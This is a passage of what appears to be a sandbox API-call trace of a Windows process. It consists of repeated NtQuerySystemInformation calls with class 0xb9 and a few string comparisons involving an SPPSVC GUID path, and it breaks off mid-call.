NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbd0, Length=0x50, ResultLength=0x0) [0272.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x28, ResultLength=0x0) [0272.918] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0272.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbd0, Length=0x50, ResultLength=0x0) [0272.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbd0, Length=0x50, ResultLength=0x0) [0272.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbd0, Length=0x50, ResultLength=0x0) [0272.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0272.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0272.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0272.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0272.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9a0, Length=0x28, ResultLength=0x0) [0272.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0272.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x28, ResultLength=0x0) [0272.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x28, ResultLength=0x0) [0272.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0272.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x20, ResultLength=0x0) [0272.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x20, ResultLength=0x0) [0272.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x20, ResultLength=0x0) [0272.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x20, ResultLength=0x0) [0272.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0272.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x20, ResultLength=0x0) [0272.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0272.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0272.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbd0, Length=0x50, ResultLength=0x0) [0272.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x28, ResultLength=0x0) [0272.928] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0272.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbd0, Length=0x50, ResultLength=0x0) [0272.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbd0, Length=0x50, ResultLength=0x0) [0272.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbd0, Length=0x50, ResultLength=0x0) [0272.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0272.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0272.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0272.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0272.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9a0, Length=0x28, ResultLength=0x0) [0272.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0272.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x28, ResultLength=0x0) [0272.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x28, ResultLength=0x0) [0272.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0272.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x20, ResultLength=0x0) [0272.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x20, ResultLength=0x0) [0272.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x20, ResultLength=0x0) [0272.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x20, ResultLength=0x0) [0272.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0272.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x20, ResultLength=0x0) [0272.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0272.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0272.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd070, Length=0x50, ResultLength=0x0) [0272.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd070, Length=0x50, ResultLength=0x0) [0272.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd070, Length=0x50, ResultLength=0x0) [0272.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf60, Length=0x50, ResultLength=0x0) [0272.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf60, Length=0x50, ResultLength=0x0) [0272.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf60, Length=0x50, ResultLength=0x0) [0272.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf60, Length=0x50, ResultLength=0x0) [0272.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce90, Length=0x38, ResultLength=0x0) [0272.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccc0, Length=0x28, ResultLength=0x0) [0272.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccc0, Length=0x28, ResultLength=0x0) [0272.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccc0, Length=0x28, ResultLength=0x0) [0272.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccc0, Length=0x28, ResultLength=0x0) [0272.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd30, Length=0x28, ResultLength=0x0) [0272.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce90, Length=0x38, ResultLength=0x0) [0272.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcdb0, Length=0x28, ResultLength=0x0) [0272.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcdb0, Length=0x28, ResultLength=0x0) [0272.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc50, Length=0x20, ResultLength=0x0) [0272.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbd0, Length=0x20, ResultLength=0x0) [0272.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbd0, Length=0x20, ResultLength=0x0) [0272.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbd0, Length=0x20, ResultLength=0x0) [0272.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce90, Length=0x38, ResultLength=0x0) [0272.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce90, Length=0x38, ResultLength=0x0) [0272.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd10, Length=0x20, ResultLength=0x0) [0272.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcca0, Length=0x20, ResultLength=0x0) [0272.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcca0, Length=0x20, ResultLength=0x0) [0272.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd008, Length=0x50, ResultLength=0x0) [0272.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf80, Length=0x28, ResultLength=0x0) [0272.964] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0272.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd008, Length=0x50, ResultLength=0x0) [0272.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd008, Length=0x50, ResultLength=0x0) [0272.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcef0, Length=0x50, ResultLength=0x0) [0272.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce70, Length=0x28, ResultLength=0x0) [0272.964] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0272.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcef0, Length=0x50, ResultLength=0x0) [0272.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcef0, Length=0x50, ResultLength=0x0) [0272.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcef0, Length=0x50, ResultLength=0x0) [0272.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce20, Length=0x38, ResultLength=0x0) [0272.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc50, Length=0x28, ResultLength=0x0) [0272.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc50, Length=0x28, ResultLength=0x0) [0272.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc50, Length=0x28, ResultLength=0x0) [0272.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccc0, Length=0x28, ResultLength=0x0) [0272.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce20, Length=0x38, ResultLength=0x0) [0272.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd40, Length=0x28, ResultLength=0x0) [0272.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd40, Length=0x28, ResultLength=0x0) [0272.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce20, Length=0x38, ResultLength=0x0) [0272.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcca0, Length=0x20, ResultLength=0x0) [0272.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc20, Length=0x20, ResultLength=0x0) [0272.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc20, 